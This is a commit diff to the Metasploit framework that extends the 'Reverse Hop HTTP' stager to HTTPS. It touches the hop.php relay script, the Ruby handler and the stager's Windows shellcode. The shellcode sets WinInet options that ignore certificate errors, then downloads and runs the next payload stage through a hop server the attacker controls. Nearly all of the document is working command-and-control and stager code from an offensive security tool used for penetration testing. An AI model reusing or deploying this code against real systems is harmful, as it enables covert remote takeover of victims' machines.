Land rapid7#6227, reverse_hop_http updates and HTTPS unification

Author: Brent Cook

data/php/hop.php

@@ -45,7 +45,7 @@ function findSendDelete($tempdir, $prefix, $one=true){
 	//get data
 	$postdata = file_get_contents("php://input");
 	//See if we should send anything down
-	if($postdata === "RECV\x00"){
+	if($postdata === "RECV\x00" || $postdata === "RECV"){
 		findSendDelete($tempdir, "down_" . sha1($url));
 		$fname = $tempdir . "/up_recv_" . sha1($url); //Only keep one RECV poll
 	}else{

lib/msf/core/handler/reverse_hop_http.rb

@@ -82,7 +82,8 @@ def start_handler
       uri.port,
       {
         'Msf'        => framework
-      }
+      },
+      full_uri.start_with?('https')
     )
     @running = true # So we know we can stop it
     # If someone is already monitoring this hop, bump the refcount instead of starting a new thread
@@ -185,6 +186,19 @@ def remove_resource(res)
     lock.unlock
   end
 
+  #
+  # Implemented for compatibility reasons
+  #
+  def resources
+    handlers
+  end
+
+  #
+  # Implemented for compatibility reasons, does nothing
+  #
+  def deref
+  end
+
   #
   # Implemented for compatibility reasons, does nothing
   #
@@ -250,19 +264,22 @@ def initialize(info = {})
   #
   def send_new_stage(uri)
     # try to get the UUID out of the existing URI
-    info = process_uri_resource(uri)
+    info = process_uri_resource(uri.to_s)
     uuid = info[:uuid] || Msf::Payload::UUID.new
 
     # generate a new connect
     sum = uri_checksum_lookup(:connect)
     conn_id = generate_uri_uuid(sum, uuid)
     conn_id = conn_id[1..-1] if conn_id.start_with? '/'
     url = full_uri + conn_id + "/\x00"
+    fulluri = URI(full_uri + conn_id)
 
     print_status("Preparing stage for next session #{conn_id}")
     blob = stage_payload(
       uuid: uuid,
-      uri:  conn_id
+      uri:  fulluri.request_uri,
+      lhost: uri.host,
+      lport: uri.port
     )
 
     #send up

lib/msf/core/payload/transport_config.rb

@@ -55,8 +55,8 @@ def transport_config_reverse_http(opts={})
 
     {
       :scheme       => 'http',
-      :lhost        => opts[:lhost],
-      :lport        => opts[:lport].to_i,
+      :lhost        => opts[:lhost] || datastore['LHOST'],
+      :lport        => opts[:lport].to_i || datastore['LPORT'].to_i,
       :uri          => uri,
       :comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
       :retry_total  => datastore['SessionRetryTotal'].to_i,

modules/payloads/stagers/windows/reverse_hop_http.rb

@@ -16,13 +16,14 @@ module Metasploit3
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'           => 'Reverse Hop HTTP Stager',
+      'Name'           => 'Reverse Hop HTTP/HTTPS Stager',
       'Description'    => %q{
-        Tunnel communication over an HTTP hop point. Note that you must first upload
+        Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload
         data/hop/hop.php to the PHP server you wish to use as a hop.
       },
       'Author'         => [
          'scriptjunkie <scriptjunkie[at]scriptjunkie.us>',
+         'bannedit',
          'hdm'
         ],
       'License'        => MSF_LICENSE,
@@ -48,6 +49,15 @@ def stage_over_connection?
     false
   end
 
+  #
+  # Generate the transport-specific configuration
+  #
+  def transport_config(opts={})
+    config = transport_config_reverse_http(opts)
+    config[:scheme] = URI(datastore['HOPURL']).scheme
+    config
+  end
+
   #
   # Generate the first stage
   #
@@ -188,12 +198,24 @@ def generate
   pop ecx
   xor edx, edx           ; NULL
   push edx               ; dwContext (NULL)
-  push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags
-    ;0x80000000 |        ; INTERNET_FLAG_RELOAD
-    ;0x04000000 |        ; INTERNET_NO_CACHE_WRITE
-    ;0x00200000 |        ; INTERNET_FLAG_NO_AUTO_REDIRECT
-    ;0x00000200 |        ; INTERNET_FLAG_NO_UI
-    ;0x00400000          ; INTERNET_FLAG_KEEP_CONNECTION
+EOS
+
+    if uri.scheme == 'http'
+      payload_data << '  push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags'
+    else
+      payload_data << '  push (0x80000000 | 0x00800000 | 0x00001000 | 0x00002000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags'
+    end
+    # 0x80000000 |        ; INTERNET_FLAG_RELOAD
+    # 0x00800000 |        ; INTERNET_FLAG_SECURE
+    # 0x00001000 |        ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
+    # 0x00002000 |        ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
+    # 0x80000000 |        ; INTERNET_FLAG_RELOAD
+    # 0x04000000 |        ; INTERNET_NO_CACHE_WRITE
+    # 0x00200000 |        ; INTERNET_FLAG_NO_AUTO_REDIRECT
+    # 0x00000200 |        ; INTERNET_FLAG_NO_UI
+    # 0x00400000          ; INTERNET_FLAG_KEEP_CONNECTION
+    payload_data << <<EOS
+
   push edx               ; accept types
   push edx               ; referrer
   push edx               ; version
@@ -223,6 +245,28 @@ def generate
 try_it_again:
   dec ebx
   jz failure
+
+EOS
+    if uri.scheme == 'https'
+      payload_data << <<EOS
+set_security_options:
+  push 0x00003380
+    ;0x00002000 |        ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
+    ;0x00001000 |        ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
+    ;0x00000200 |        ; SECURITY_FLAG_IGNORE_WRONG_USAGE
+    ;0x00000100 |        ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
+    ;0x00000080          ; SECURITY_FLAG_IGNORE_REVOCATION
+  mov eax, esp
+  push 0x04                 ; sizeof(dwFlags)
+  push eax               ; &dwFlags
+  push 0x1f              ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
+  push esi               ; hRequest
+  push 0x869E4675        ; hash( "wininet.dll", "InternetSetOptionA" )
+  call ebp
+
+EOS
+  end
+  payload_data << <<EOS
   jmp.i8 httpsendrequest
 
 dbl_get_server_host: